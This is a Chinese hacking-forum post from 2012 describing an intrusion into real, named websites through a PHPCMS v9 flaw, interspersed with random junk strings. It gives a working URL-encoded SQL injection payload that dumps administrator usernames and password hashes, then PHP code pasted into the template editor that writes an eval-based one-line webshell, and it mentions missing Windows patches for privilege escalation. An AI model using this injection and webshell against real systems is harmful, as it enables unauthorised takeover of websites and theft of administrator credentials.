找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2264|回复: 0
打印 上一主题 下一主题

利用phpcms v9 0day拿shell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-20 08:44:41 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
期末快到了,各种作业啊。。学计算机的伤不起啊。。话说我们有门课很有意思,叫做黑客攻防,期末作业就是黑站,我笑了。。前几天在服务器上嗅探把服务器搞死了,管理员漏洞也补了,写这篇文章单凭记忆,图片较少,还请见谅。

Author:夜行人

From:F4ck Team


2 ?0 K3 F( l5 d. S; _4 y1 d

目标站:http://www.ipucom.com/

旁注到一个站点:www.zhongyitong.com有phpcmsv9注射漏洞

百度一下找到该漏洞的利用方法。

直接在该网站注册用户名,然后在该网站域名后加上这段代码就能爆出数据库名

api.php?op=add_favorite&url=xx.oo&title=%2527' t$ v9 y% _; u8 u( ?2 \8 I0 }9 u
                                             
  ?$ l* t/ u" ~4 H' w
5 p4 n- n, \5 r- U# C                                
4 T' w: B0 }+ t9 F+ g
$ g/ V0 f3 Q1 V' J                                                           7 M0 s9 Z" z5 r- B0 V

) m: a9 }2 Z$ S$ K
2 g  a3 e& N& ^( T: ?9 Y
8 i3 Y8 Y8 S* _
  c* w: o; l8 ?8 ?$ i' D/ O% D! Z                                                         
& K* V2 O& S+ U" r5 }3 d, u7 J4 J1 t                                                          3 Z% s% Q) V- |$ Z. {2 Y  k

这里可以清楚的看到数据库名和表名,然后把该表名替换一下代码中的表名

api.php?op=add_favorite&url=xx.oo&title=%2527%2520and%2520%2528select%25201%2520from%

2528select%2520count%2528%252a%2529%252Cconcat%2528%2528select%2520%2528select

%2520%2528select%2520concat%25280x23%252Ccast%2528concat%2528username%252C0x3a%252C

password%252C0x3a%252Cencrypt%2529%2520as%2520char%2529%252C0x23%2529%2520from

%2520v9_admin%2520LIMIT%25200%252C1%2529%2529%2520from%2520information_schema.tables

%2520limit%25200%252C1%2529%252Cfloor%2528rand%25280%2529%252a2%2529%2529x%2520from

%2520information_schema.tables%2520group%2520by%2520x%2529a%2529%2520and

%2520%25271%2527%253D%25271

7 o5 _& F+ ?4 K! N, ?

                                            ) w) X. V; [- o! m, g2 B$ A/ R

& j; }; z5 z- z4 Z! p, Q8 n1 F# D- e' ^( s) |  Z

' R* O! @$ n% ]; Z- h

帐号密码就出来了,md5解密一下就行了

进入后台, 界面 > 模板管理 > 模板风格 >
; {$ d7 o- q$ C* u& ^/ A
" J* Q" n& f( y/ \4 p) |7 C
0 r( O3 C9 d1 R5 O* {                                                
- K; k9 f; b3 ]# ]
6 x; T& k+ K' f: N
0 V: W# Z+ h1 D; W' O2 s6 \  y% T; n/ z. W# S. ]/ d1 H
0 N$ f9 [$ T* k6 B  @$ ^

8 |7 n+ k8 o( B! b5 @/ ~* |

点击后面的修改,然后把一下代码复制上去保存

<?

$fp = @fopen("c.php", 'a');

@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[zmzsg100])'."\r\n\r\n?".">\r\n");

@fclose($fp);

?>
/ k; o5 h3 C1 o- e* H  ?9 J- C  Y! E; S* j: z6 d9 K+ ^

( M. V* f3 F6 H& R. ~  C
+ D, V. v% y4 Z+ K1 U* c- U. @
. H' \4 S" e( j0 ?- _' p                                                                        
2 r4 Y9 f7 S/ k1 e7 v  l) b0 K. F) B+ ^1 P

  Y& s. y/ z# j, H- U4 X) d% C4 R
# A' w" m9 i4 a9 n, C" D
" s0 @* Y6 O, w4 T7 J
6 w0 h: |( R& H% S) J* {1 G

提交后可视化一下# s) B" c4 K. y5 m
8 m& F( B" x1 S7 u6 t

在网站的根目录就生成了你的一句话木马客户端

http://www.zhongyitong.com/f4ck.php

然后通过控制端连上去就行了。。。

提权貌似很简单,看了下systeminfo

发现没有

KB2503665

KB2592799

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表